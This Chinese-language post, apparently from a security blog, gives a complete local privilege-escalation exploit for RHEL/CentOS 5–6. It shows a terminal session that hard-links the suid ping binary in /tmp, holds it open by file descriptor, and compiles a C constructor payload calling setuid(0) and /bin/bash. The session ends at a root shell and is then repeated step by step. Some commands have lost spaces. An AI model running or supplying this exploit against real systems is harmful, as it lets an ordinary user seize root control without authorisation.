摘要
利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限
合适用 RHEL5-RHEL6 CENTOS5-CENTOS6 均可以提权
提权方法
[moonsec@localhosttmp]$ mkdir /tmp/exploit
[moonsec@localhosttmp]$ ln /bin/ping /tmp/exploit/target
[moonsec@localhosttmp]$ exec 3< /tmp/exploit/target
[moonsec@localhosttmp]$ ls -l /proc/$$/fd/3
lr-x------ 1moonsec moonsec 64 Dec 19 06:10 /proc/2799/fd/3 -> /tmp/exploit/target
[moonsec@localhosttmp]$ rm -rf /tmp/exploit/
[moonsec@localhosttmp]$ ls -l /proc/$$/fd/3
lr-x------ 1moonsec moonsec 64 Dec 19 06:10 /proc/2799/fd/3 -> /tmp/exploit/target(deleted)
[moonsec@localhosttmp]$ cat > payload.c
void__attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
[moonsec@localhosttmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[moonsec@localhosttmp]$ ls -l /tmp/exploit
-rwxrwxr-x 1moonsec moonsec 4223 Dec 19 06:10 /tmp/exploit
[moonsec@localhosttmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
[root@localhosttmp]# whoami
创建目录
mkdir /tmp/exploit
创建target文件硬链接
ln /bin/ping/tmp/exploit/target
把target文件加载到内存中
exec 3< /tmp/exploit/target
查看target在内存中的情况
ls -l /proc/$$/fd/3
删除目录
rm -rf /tmp/exploit/
输入c代码
cat > payload.c
void__attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
编译文件
gcc -w -fPIC-shared -o /tmp/exploit payload.c
提升root权限
LD_AUDIT="\$ORIGIN"exec /proc/self/fd/3
cetnots5.5 用户moonsec 提权到root权限
您可以选择一种方式赞助本站支付宝转账赞助
分享到各大网站